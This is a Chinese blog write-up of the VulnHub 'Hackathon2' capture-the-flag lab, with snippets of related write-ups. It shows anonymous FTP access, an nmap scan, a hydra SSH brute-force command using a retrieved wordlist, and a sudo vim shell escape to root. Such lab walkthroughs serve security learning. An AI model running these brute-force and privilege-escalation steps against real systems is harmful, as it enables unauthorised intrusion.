Vulnhub_Hackathon2

最新推荐文章于 2024-02-03 18:39:35 发布
最新推荐文章于 2024-02-03 18:39:35 发布
阅读量428 收藏 1
点赞数
文章标签: css less nmap 信息安全 nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/118865776
版权


主机信息

kali:192.168.1.9
Hackathon2:192.168.1.13

信息收集

使用nmap探测目标主机开放的端口信息

nmap -T4 -A -v -p- 192.168.1.13


通过探测目标主机开放端口,发现开放了21端口并且可匿名登录,然后登录ftp查看文件

ftp> open 192.168.1.13
Connected to 192.168.1.13.
220 (vsFTPd 3.0.3)
Name (192.168.1.13:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag1.txt (47 bytes).
226 Transfer complete.
47 bytes received in 0.00 secs (19.7243 kB/s)
ftp> get word.dir
local: word.dir remote: word.dir
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for word.dir (849 bytes).
226 Transfer complete.
849 bytes received in 0.00 secs (877.3562 kB/s)
ftp> exit


查看从FTP获取的第一个Flag

查看word.dic发现是一个字典文件

通过目录扫描发现happy目录,访问查看源码发现用户名提示

GETSHELL

使用hydra进行爆破

hydra -L user_hackton2  -P word.dir 192.168.1.13 -s 7223 ssh


得到密码后登录执行sudo -l查看发现vim可利用

sudo -l

提权

使用vim提权

sudo vim 
:!/bin/bash


查看第二个flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub--HackathonCTF:2
venu_s的博客
06-22 288
靶机介绍 difficult:easy goal:get two flags download:https://www.vulnhub.com/entry/hackathonctf-2,714/ 信息探测 主机发现 端口扫描 查看端口的的详细信息,21端口可以使用anonymous身份登陆,有flag1.txt和word.dir两个文件;7223是ssh端口 目录扫描,有一个/happy 访问80端口,没什么发现,查看源代码,也没什么发现 访问/happy 查看源码,发现一个用户名 至此,网页的
vulnhub之HACKATHONCTF: 1
weixin_44537595的博客
11-05 653
靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/ 查看对方的主机mac地址 我们用我们的kali进行存活主机扫描 命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24 搜索到对方主机的ip地址为 192.168.25.84 3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt 命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt 4
Hackathon2
qwweggfe的博客
08-02 177
Hackathon2 kali:192.168.181.129 靶机:192.168.181.133 信息搜集 首先查看有哪些端口开启 扫描ip地址 看看端口开启了协议 ...
vulnhub渗透测试题目Hackathon2
weixin_44687621的博客
07-29 371
vulnhub渗透测试题目Hackathon2 1.安装靶场环境 下载镜像文件:http://www.vulnhub.com/entry/hackathonctf-2,714/ 解压得到ovf文件 双击这个文件,用vmware打开,可以进行导入虚拟机操作 导入的虚拟机的网络适配器可以改为NAT模式 2.信息搜集 首先使用nmap扫描靶机的ip地址 我们kali本机的ip地址被分配为192.168.16.128,那么靶机的ip地址就应该是192.168.16.129了 接下来查看该靶机开放了哪些端口
hackathon_wcs_vvv_front:Hackathon#2
05-28
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误。 npm test 在交互式监视模式下启动测试运行器。 有关更多信息,请参见关于的部分。 npm run build 构建生产到应用程序build文件夹。 它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。 生成被最小化,并且文件名包括哈希值。 您的应用已准备好进行部署! 有关更多信息,请参见关于的部分。 npm run eject 注意:这是单向操作。 eject ,您将无法返回! 如果您对构建工具和配置选择不满意,则可以随时eject 。 此命令将从您的项目中删除单个生成依赖项。 相反,它将所有配置文件和传递依赖项(we
wishlist_hackathon2
04-11
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
pixnet_hackathon_2015:pixnet_hackathon_2015
05-11
pixnet_hackathon_2015 pixnet_hackathon_2015垃圾邮件检测绩效评估。 我们提供score.py来评估您的预测效果。 格式。 Score.py能够处理以下json格式的数据:[ { " author " : " author_id " , " is_spam " : 1 }, { ...
web_hackathon
03-21
2. **CSS文件**:CSS(Cascading Style Sheets)用于控制网页的样式和布局,团队可能会有一个或多个CSS文件来实现独特的设计效果。 3. **JavaScript文件**:为了实现交互性,团队可能使用JavaScript编写动态功能,如...
EZ_Tenda_Hackathon
03-21
2. `Gemfile.lock`:记录具体版本的gem,确保不同开发者或服务器上的环境一致。 3. `app`目录:包含模型(model)、视图(view)和控制器(controller),构成MVC架构的基础。 4. `config`目录:存放项目配置,如数据库...
MMUB_Hackathon
04-11
2. **文档**:可能包含项目概述、设计文档、用户手册、技术规格说明等,这些文档可以帮助读者理解项目的功能、目标以及实现方法。 3. **资源文件**:如图片、音频、视频或数据集,这些都是项目开发过程中可能用到的...
渗透靶场--HackathonCTF 2
weixin_45794666的博客
07-20 523
HackathonCTF 2 1.首先nmap扫描获得ip 2.扫描全端口并记录信息 nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 192.168.19.141 3.可以看到ftp上匿名用户可以得到flag1.txt和word.dir 4.那么接下来就是利用这个字典爆破ssh 5.还有一个80端口,目录扫描得到一个happy目录,查看源代码获取到用户名 6.hydra ssh爆破 hydra -l hackathonll -P word.dir
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 912
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
vulnhub Hackathon2渗透笔记
weixin_52268949的博客
04-09 387
靶机下载地址:https://www.vulnhub.com/entry/hackathonctf-2,714/kali ip地址:192.168.20.130。
HACKATHONCTF 2靶机
logan_logan的博客
07-19 224
1.端口扫描 端口扫描发现FTP可以匿名登录,同时SSH登录端口被改为7223; 2.匿名登录FTP 登录成功之后发现两个文件,下载到本地进行打开; word.dir文件是以dir为后缀结尾,猜测这个文件是目录字典; 3.目录扫描 使用这个文件作为目录字典进行枚举; 成功枚举出happy目录,在网页打开,发现了一个用户名; 4.暴力破解 使用这个用户hackathonll进行暴力破解登录,尝试了好几个字典,最后还是用这个word.dir文件成功得出密码; 成功登录之后使用sudo -l发现vim可
NVIDIA 7th SkyHackathon(二)开发套件的安装与测试
Alex_McAvoy的博客
11-30 813
NVIDIA 第七届 SkyHackathon 笔记
Vulnhub靶机:hacksudo2 (HackDudo)
最新发布
qq_48904485的博客
02-03 1169
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo2 (HackDudo)(10.0.2.44)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hackdudo2.rar。
vulnhub_HackathonCTF: 1
weixin_50698958的博客
11-06 480
靶机下载:点我 测试过程: 1、在本地启动靶场,设置网卡为VMnet8,自动获取IP,查看物理MAC 2、使用nmap扫描网段,找到IP为192.168.220.130 3、看到80端口开着,就尝试访问一下 报错,使用的是Apache服务器,版本2.4.7,百度一下存在Apache解析漏洞 4、使用御剑扫描一下后台目录,发现robots.txt 5、尝试访问一下robots.txt 发现base64加密内容 c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
【VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4078
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
Hack the BTRSys1(Boot2Root Challenge)【VulnHub靶场】渗透测试实战系列1
重新启程
11-25 1284
靶场下载地址:BTRSys: v1 下载完毕之后直接导入到VMWare,看下设置了DHCP,那就在内网网段~~ 接着就打开内网的另外一台攻击机器Kali,首先搜集一下信息,Zenmap开始扫描,其实也就是nmap包装了一个UI界面。 Okay,扫描结果出来了,看下图: 主要提供了下面三个服务端口: vsftd,这个应该版本有点老,可以exploit一下,小本本记下来 ss...
java hackathon编程题目
08-18
Java Hackathon编程题目是一个编程竞赛,参赛者需要使用Java语言解决给定的问题。具体题目可能涉及各种不同的领域和难度级别,例如算法、数据结构、网络编程等。 参赛者需要使用Java语言编写程序,并在规定的时间内...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值